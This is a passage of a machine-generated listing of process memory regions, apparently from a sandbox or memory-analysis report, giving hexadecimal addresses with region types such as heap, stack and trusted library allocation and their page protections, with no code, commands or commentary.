page read and write
97C4000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
B010000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
2BD63313000
heap
page read and write
8450000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
1FB440D8000
heap
page read and write
9300000
trusted library allocation
page read and write
254F8AC0000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
94E0000
unkown
page read and write
8450000
unkown
page read and write
92F0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
4A60000
trusted library allocation
page read and write
83D0000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9060000
trusted library allocation
page read and write
9333000
trusted library allocation
page read and write
A3C0000
trusted library allocation
page read and write
8310000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
9016000
trusted library allocation
page read and write
B010000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
B0D0000
trusted library allocation
page read and write
9020000
unkown
page read and write
31C0000
trusted library allocation
page read and write
9394000
trusted library allocation
page read and write
D40000
heap
page read and write
3428ACB000
stack
page read and write
DB050FE000
stack
page read and write
7230000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
8280000
trusted library allocation
page read and write
BF80000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
B1E0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
49CC000
stack
page read and write
4E60000
heap
page read and write
9460000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
2D17F650000
heap
page read and write
B060000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
5F16D000
unkown
page read and write
684000
heap
page read and write
8450000
trusted library allocation
page read and write
3528000
heap
page read and write
4B0000
heap
page read and write
8300000
trusted library allocation
page read and write
420000
heap
page read and write
D18000
heap
page read and write
A410000
trusted library allocation
page read and write
16105170000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
4F14000
heap
page read and write
9770000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
5286000
heap
page read and write
AF80000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
3060000
trusted library allocation
page read and write
9680000
trusted library allocation
page read and write
92E0000
unkown
page read and write
1FB3FC61000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
7210000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
884000
heap
page read and write
1FB3E800000
heap
page read and write
92F0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
82E0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
E9A000
stack
page read and write
97A0000
trusted library allocation
page read and write
4C2F000
heap
page read and write
B040000
trusted library allocation
page read and write
7200000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
8FF5000
trusted library allocation
page read and write
5261000
heap
page read and write
A3E0000
trusted library allocation
page read and write
4F30000
trusted library allocation
page read and write
B075000
trusted library allocation
page read and write
8330000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
A3D0000
trusted library allocation
page read and write
4BB0000
heap
page read and write
2EF0000
remote allocation
page read and write
97D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
DB051FC000
stack
page read and write
9750000
trusted library allocation
page read and write
794000
heap
page read and write
1FA000
stack
page read and write
9302000
trusted library allocation
page read and write
92B5000
trusted library allocation
page read and write
D3EF1AE000
stack
page read and write
515E000
stack
page read and write
9760000
trusted library allocation
page read and write
D3EF4FB000
stack
page read and write
8456000
unkown
page read and write
9210000
trusted library allocation
page read and write
1B55D647000
heap
page read and write
FD0000
trusted library allocation
page read and write
16105200000
heap
page read and write
9260000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
B000000
trusted library allocation
page read and write
930B000
trusted library allocation
page read and write
B030000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9030000
unkown
page read and write
843C78000
unkown
page read and write
9010000
trusted library allocation
page read and write
2BD639A0000
trusted library allocation
page read and write
2E3B000
stack
page read and write
5264000
heap
page read and write
7F30000
trusted library allocation
page read and write
EA0000
heap
page read and write
16105300000
heap
page read and write
9530000
trusted library allocation
page read and write
95BF000
trusted library allocation
page read and write
2BD63274000
heap
page read and write
F8E000
stack
page read and write
93A0000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
5038000
heap
page read and write
9750000
trusted library allocation
page read and write
31A0000
heap
page read and write
5AA2000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
20E29920000
heap
page read and write
4F9F000
heap
page read and write
8FF0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
C3C1000
trusted library allocation
page read and write
C0DD000
trusted library allocation
page read and write
AF81000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
4593000
heap
page read and write
2BE8000
heap
page read and write
B050000
trusted library allocation
page read and write
7F08000
trusted library allocation
page read and write
8450000
unkown
page read and write
9750000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
207B2FE000
stack
page read and write
5773000
trusted library allocation
page read and write
3442000
heap
page read and write
9450000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
4A90000
trusted library allocation
page read and write
878000
heap
page read and write
684000
heap
page read and write
558F000
stack
page read and write
52C5000
heap
page read and write
5110000
trusted library allocation
page read and write
51A0000
direct allocation
page read and write
C83E379000
stack
page read and write
FD0000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
8FF0000
unkown
page read and write
8450000
unkown
page read and write
684000
heap
page read and write
254F8F10000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
C7C000
stack
page read and write
9200000
trusted library allocation
page read and write
578D000
trusted library allocation
page read and write
4F36000
trusted library allocation
page read and write
4EE3000
heap
page read and write
9760000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
946A000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
31AC000
heap
page read and write
4680000
trusted library allocation
page read and write
260000
heap
page read and write
A410000
trusted library allocation
page read and write
1FB43F50000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
D96000
heap
page read and write
BC41000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
6F0000
remote allocation
page read and write
32D0000
trusted library allocation
page read and write
B0E0000
trusted library allocation
page read and write
9035000
trusted library allocation
page read and write
1FB440FB000
heap
page read and write
9530000
trusted library allocation
page read and write
82D0000
trusted library allocation
page execute and read and write
B050000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
D3EF12E000
stack
page read and write
B050000
trusted library allocation
page read and write
4B10000
remote allocation
page read and write
B05A000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
1CB48A53000
heap
page read and write
1CB48B08000
heap
page read and write
2E5C000
stack
page read and write
508F000
heap
page read and write
9520000
trusted library allocation
page read and write
92D0000
unkown
page read and write
7E35000
trusted library allocation
page read and write
5050000
direct allocation
page read and write
94C0000
trusted library allocation
page read and write
9390000
trusted library allocation
page read and write
536F000
stack
page read and write
9200000
trusted library allocation
page read and write
30B0000
heap
page read and write
1FB3E902000
heap
page read and write
1000000
trusted library allocation
page read and write
C83DEBC000
stack
page read and write
310E000
stack
page read and write
9330000
trusted library allocation
page read and write
B070000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
E2E000
heap
page read and write
A450000
trusted library allocation
page read and write
4F0000
remote allocation
page read and write
F90000
trusted library allocation
page read and write
619D000
trusted library allocation
page read and write
3368000
heap
page read and write
B040000
trusted library allocation
page read and write
1267000
heap
page read and write
7200000
trusted library allocation
page read and write
4F07000
heap
page read and write
9310000
trusted library allocation
page read and write
8455000
unkown
page read and write
C2D6000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
61F6000
trusted library allocation
page read and write
30FE000
stack
page read and write
9010000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9525000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
C319000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
9340000
trusted library allocation
page execute and read and write
A400000
trusted library allocation
page read and write
B93CDFE000
stack
page read and write
9813000
trusted library allocation
page read and write
7B0000
remote allocation
page read and write
71E0000
trusted library allocation
page read and write
94C8000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
56D5000
trusted library allocation
page read and write
BE1E000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
9025000
unkown
page read and write
9750000
trusted library allocation
page read and write
8FF0000
unkown
page read and write
8FF0000
unkown
page read and write
8300000
trusted library allocation
page read and write
2EB0000
remote allocation
page read and write
93F0000
trusted library allocation
page read and write
4E27000
heap
page read and write
20E29990000
heap
page read and write
8450000
trusted library allocation
page read and write
4FAE000
stack
page read and write
254F8B20000
heap
page read and write
3428EFC000
stack
page read and write
FF0000
trusted library allocation
page read and write
4D40000
heap
page read and write
94A0000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
B010000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
29A18488000
heap
page read and write
1CB48A3C000
heap
page read and write
1FB3E7F3000
trusted library allocation
page read and write
E2E000
heap
page read and write
93F0000
trusted library allocation
page read and write
5248000
heap
page read and write
29A18413000
heap
page read and write
5110000
trusted library allocation
page read and write
6E0000
heap
page read and write
FF0000
trusted library allocation
page read and write
AF60000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
5281000
heap
page read and write
29A18449000
heap
page read and write
E3C000
heap
page read and write
4C01000
heap
page read and write
9520000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
93A0000
unkown
page read and write
8450000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
5190000
direct allocation
page read and write
92B0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
2FC0000
heap
page read and write
4EC4000
heap
page read and write
A3D9000
trusted library allocation
page read and write
2F70000
remote allocation
page read and write
97D0000
trusted library allocation
page read and write
A450000
trusted library allocation
page read and write
4F45000
trusted library allocation
page execute and read and write
9530000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
A417000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
338C000
heap
page read and write
97A0000
trusted library allocation
page read and write
4E90000
heap
page read and write
9260000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
28DC07F000
stack
page read and write
9490000
trusted library allocation
page read and write
1FB3F8F0000
trusted library section
page readonly
9335000
trusted library allocation
page read and write
FB0000
heap
page read and write
A3E0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
5060000
heap
page read and write
7E36000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
F5B000
stack
page read and write
9340000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9215000
trusted library allocation
page read and write
82E0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
3490000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
8310000
trusted library allocation
page read and write
A413000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
4F23000
trusted library allocation
page read and write
57CD000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
30CF000
stack
page read and write
C324000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
BEBF000
trusted library allocation
page read and write
3609000
heap
page read and write
4F35000
trusted library allocation
page read and write
4E20000
heap
page read and write
9330000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
93A0000
unkown
page read and write
254F8BBE000
heap
page read and write
9450000
trusted library allocation
page read and write
1B55DE02000
trusted library allocation
page read and write
82E0000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
2F4C000
stack
page read and write
254F8BBE000
heap
page read and write
2EB0000
remote allocation
page read and write
9450000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
1FB3E87A000
heap
page read and write
B020000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
56FF000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
610000
heap
page read and write
9480000
trusted library allocation
page read and write
4590000
heap
page read and write
B050000
trusted library allocation
page read and write
16105302000
heap
page read and write
92F0000
unkown
page read and write
794000
heap
page read and write
B040000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
B140000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
84A000
heap
page read and write
4F7B000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
339D000
stack
page read and write
B040000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
845C000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
DB04D9B000
stack
page read and write
FD0000
trusted library allocation
page read and write
5721000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
AF90000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
13565310000
unkown
page readonly
2E50000
remote allocation
page read and write
DB0577F000
stack
page read and write
2E97000
unkown
page read and write
B2A0000
trusted library allocation
page execute and read and write
884000
heap
page read and write
7310000
trusted library allocation
page read and write
9C0000
heap
page read and write
93E0000
trusted library allocation
page read and write
780000
heap
page read and write
82F0000
trusted library allocation
page read and write
95F6000
unkown
page read and write
8450000
trusted library allocation
page read and write
8320000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
790000
heap
page read and write
9480000
trusted library allocation
page read and write
92D0000
unkown
page read and write
9810000
trusted library allocation
page read and write
B070000
trusted library allocation
page read and write
688000
stack
page read and write
EB0000
unkown
page read and write
20E29B08000
heap
page read and write
48E7000
stack
page read and write
92A8000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
77B6000
trusted library allocation
page read and write
4F77000
trusted library allocation
page read and write
4C00000
heap
page read and write
9520000
trusted library allocation
page read and write
499D000
stack
page read and write
9480000
trusted library allocation
page read and write
4990000
heap
page read and write
B030000
trusted library allocation
page read and write
4F36000
trusted library allocation
page execute and read and write
9300000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
20E29A6E000
heap
page read and write
1B55D702000
heap
page read and write
B030000
trusted library allocation
page read and write
4F10000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
8340000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
8310000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
50B0000
direct allocation
page read and write
8455000
unkown
page read and write
9266000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
6D50000
direct allocation
page read and write
4E8D87B000
stack
page read and write
9300000
trusted library allocation
page read and write
1FB3F159000
heap
page read and write
4EBA000
heap
page read and write
5219000
heap
page read and write
9760000
trusted library allocation
page read and write
20E29A29000
heap
page read and write
AF70000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
990000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
8462000
trusted library allocation
page read and write
5F150000
unkown
page readonly
A41C000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
1FB3E610000
heap
page read and write
9045000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
4BDF000
heap
page read and write
8450000
unkown
page read and write
9490000
trusted library allocation
page execute and read and write
9390000
trusted library allocation
page execute and read and write
7380000
trusted library allocation
page read and write
2BD6326D000
heap
page read and write
B93CCFF000
stack
page read and write
5B7B000
trusted library allocation
page read and write
F90000
trusted library section
page read and write
9750000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
1FB440E6000
heap
page read and write
B070000
trusted library allocation
page read and write
93C6000
trusted library allocation
page read and write
135652C0000
unkown
page read and write
72E000
stack
page read and write
92D0000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
7EF8000
trusted library allocation
page read and write
A250000
trusted library allocation
page read and write
5286000
heap
page read and write
4EDC000
heap
page read and write
829C000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
5259000
heap
page read and write
BE3D000
trusted library allocation
page read and write
1FB3E877000
heap
page read and write
8AE000
stack
page read and write
9341000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
4F30000
trusted library allocation
page read and write
8310000
trusted library allocation
page read and write
4F0000
remote allocation
page read and write
4F3C000
stack
page read and write
527E000
heap
page read and write
8450000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
2F70000
remote allocation
page read and write
511D000
stack
page read and write
92D0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
5030000
heap
page read and write
7270000
trusted library allocation
page read and write
9035000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
4F16000
heap
page read and write
2D17F800000
heap
page read and write
52B9000
heap
page read and write
B050000
trusted library allocation
page read and write
2F70000
remote allocation
page read and write
9035000
trusted library allocation
page read and write
7EF9000
trusted library allocation
page read and write
600000
trusted library allocation
page read and write
D47000
heap
page read and write
7200000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
5796000
trusted library allocation
page read and write
B080000
trusted library allocation
page execute and read and write
9780000
trusted library allocation
page read and write
58AD000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
61C2000
trusted library allocation
page read and write
9763000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
A1C0000
trusted library allocation
page read and write
D3EF6F7000
stack
page read and write
2E90000
remote allocation
page read and write
9750000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
4F9F000
heap
page read and write
82E0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
B110000
trusted library allocation
page read and write
6D77000
direct allocation
page read and write
9390000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
2FAE000
stack
page read and write
49A8000
heap
page read and write
9025000
trusted library allocation
page read and write
254F9B40000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
B020000
trusted library allocation
page read and write
C3D4000
trusted library allocation
page read and write
A410000
trusted library allocation
page execute and read and write
93D0000
trusted library allocation
page read and write
76F000
stack
page read and write
2BD63A02000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
4E6000
heap
page read and write
FF0000
trusted library allocation
page read and write
953F000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
6D90000
direct allocation
page read and write
9010000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
61A6000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
B150000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
527E000
heap
page read and write
2D17F660000
heap
page read and write
254F9B70000
trusted library allocation
page read and write
9200000
unkown
page read and write
9780000
trusted library allocation
page read and write
8455000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
C3CC000
trusted library allocation
page read and write
B270000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
7ED6000
trusted library allocation
page read and write
28DC2FF000
stack
page read and write
8450000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
9200000
unkown
page read and write
9760000
trusted library allocation
page read and write
2D17F83C000
heap
page read and write
94B7000
trusted library allocation
page read and write
92E0000
unkown
page read and write
9810000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9335000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
4FE5000
trusted library allocation
page read and write
C0E5000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
97D5000
trusted library allocation
page read and write
97D7000
trusted library allocation
page read and write
91F9000
trusted library allocation
page read and write
56F4000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
5110000
direct allocation
page read and write
C278000
trusted library allocation
page read and write
29A183A0000
trusted library allocation
page read and write
552F000
stack
page read and write
8450000
trusted library allocation
page read and write
3380000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
4B10000
remote allocation
page read and write
94A0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
9200000
unkown
page read and write
5259000
heap
page read and write
338F000
stack
page read and write
1FB3E780000
trusted library allocation
page read and write
8450000
unkown
page read and write
9300000
trusted library allocation
page read and write
92F0000
unkown
page read and write
161050E0000
heap
page read and write
A202000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
B090000
trusted library allocation
page read and write
2BD639C0000
unkown
page readonly
49F0000
trusted library section
page read and write
82C0000
trusted library allocation
page read and write
254F8BD8000
heap
page read and write
4F79000
trusted library allocation
page read and write
4F46000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
95F0000
unkown
page read and write
92E0000
unkown
page read and write
B020000
trusted library allocation
page read and write
31DE000
stack
page read and write
9590000
unkown
page read and write
9750000
trusted library allocation
page read and write
9784000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
4D51000
trusted library allocation
page read and write
570D000
trusted library allocation
page read and write
4710000
remote allocation
page read and write
A8FD000
stack
page read and write
8FF0000
trusted library allocation
page read and write
4A0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
8450000
unkown
page read and write
9450000
trusted library allocation
page read and write
4ECE000
heap
page read and write
8FF0000
trusted library allocation
page read and write
254F9900000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
575C000
trusted library allocation
page read and write
314E000
stack
page read and write
93F0000
trusted library allocation
page read and write
51C0000
direct allocation
page read and write
8455000
trusted library allocation
page read and write
A450000
trusted library allocation
page read and write
BE5B000
trusted library allocation
page read and write
8450000
unkown
page read and write
9520000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
B93CEFF000
stack
page read and write
A460000
trusted library allocation
page execute and read and write
9470000
trusted library allocation
page read and write
D3EF9FE000
stack
page read and write
31E0000
heap
page read and write
9780000
trusted library allocation
page read and write
4C60000
heap
page read and write
8FF5000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
A1BA000
stack
page read and write
93B0000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
5707000
trusted library allocation
page read and write
29A18502000
heap
page read and write
93A0000
trusted library allocation
page read and write
5271000
heap
page read and write
A3EE000
trusted library allocation
page read and write
9750000
unkown
page read and write
16105240000
heap
page read and write
794000
heap
page read and write
9390000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
8298000
trusted library allocation
page read and write
2F70000
remote allocation
page read and write
9780000
trusted library allocation
page read and write
A3D3000
trusted library allocation
page read and write
56DF000
stack
page read and write
9308000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
9040000
trusted library allocation
page read and write
82EC000
trusted library allocation
page read and write
4F43000
trusted library allocation
page read and write
A3C0000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
4FA2000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
2E50000
remote allocation
page read and write
A420000
trusted library allocation
page read and write
3308000
heap
page read and write
93D0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
7500000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
2EA0000
heap
page read and write
9320000
trusted library allocation
page read and write
52A7000
heap
page read and write
B050000
trusted library allocation
page read and write
254F8BBE000
heap
page read and write
5B72000
trusted library allocation
page read and write
4E90000
trusted library allocation
page read and write
8450000
unkown
page read and write
9220000
trusted library allocation
page read and write
5272000
heap
page read and write
5729000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
82F0000
trusted library allocation
page execute and read and write
2EB0000
remote allocation
page read and write
9380000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
5A9A000
trusted library allocation
page read and write
8FF7000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
E2E000
heap
page read and write
BDAA000
trusted library allocation
page read and write
B000000
trusted library allocation
page read and write
F90000
heap
page read and write
8450000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
95C3000
trusted library allocation
page read and write
97C0000
trusted library allocation
page execute and read and write
7EDA000
trusted library allocation
page read and write
5298000
heap
page read and write
7390000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
51FD000
heap
page read and write
1FB44021000
heap
page read and write
4E8D31C000
stack
page read and write
488000
stack
page read and write
74D0000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
8450000
unkown
page read and write
9030000
trusted library allocation
page read and write
1FB43C90000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
4A3E000
stack
page read and write
A3E0000
trusted library allocation
page read and write
29A18513000
heap
page read and write
92A0000
trusted library allocation
page read and write
61A8000
trusted library allocation
page read and write
1FB43F70000
trusted library allocation
page read and write
525E000
heap
page read and write
8450000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
9570000
trusted library allocation
page read and write
29A18400000
heap
page read and write
9770000
trusted library allocation
page execute and read and write
93C5000
trusted library allocation
page read and write
91F4000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
8FF0000
unkown
page read and write
58FF000
direct allocation
page read and write
517000
unkown
page read and write
97D0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8FF5000
trusted library allocation
page read and write
4F04000
heap
page read and write
6D88000
direct allocation
page read and write
9020000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
8450000
unkown
page read and write
FD0000
trusted library allocation
page read and write
1FB3E913000
heap
page read and write
20E29A3C000
heap
page read and write
52E0000
trusted library allocation
page read and write
3560000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
92D0000
unkown
page read and write
7340000
trusted library allocation
page read and write
A3D0000
trusted library section
page read and write
9300000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8450000
unkown
page read and write
920F000
stack
page read and write
9390000
unkown
page read and write
8450000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
794000
heap
page read and write
254F8BC0000
heap
page read and write
A400000
trusted library allocation
page read and write
B220000
trusted library allocation
page read and write
1FB3F015000
heap
page read and write
8455000
unkown
page read and write
1CB48A77000
heap
page read and write
52B9000
heap
page read and write
2FD8000
heap
page read and write
9750000
trusted library allocation
page read and write
594E000
stack
page read and write
95CF000
trusted library allocation
page read and write
48AD000
stack
page read and write
B070000
trusted library allocation
page read and write
A3D0000
trusted library allocation
page read and write
DE1000
heap
page read and write
8450000
trusted library allocation
page read and write
8455000
unkown
page read and write
92E0000
trusted library allocation
page read and write
1FB43E20000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
9494000
trusted library allocation
page read and write
4DF9000
stack
page read and write
9340000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
48EF000
heap
page read and write
42F1000
unkown
page execute read
9290000
unkown
page read and write
8FF0000
trusted library allocation
page read and write
C108000
trusted library allocation
page read and write
29E0000
trusted library allocation
page read and write
5A34000
trusted library allocation
page read and write
52B7000
heap
page read and write
748000
stack
page read and write
94C0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
DB0537A000
stack
page read and write
9430000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
A417000
trusted library allocation
page read and write
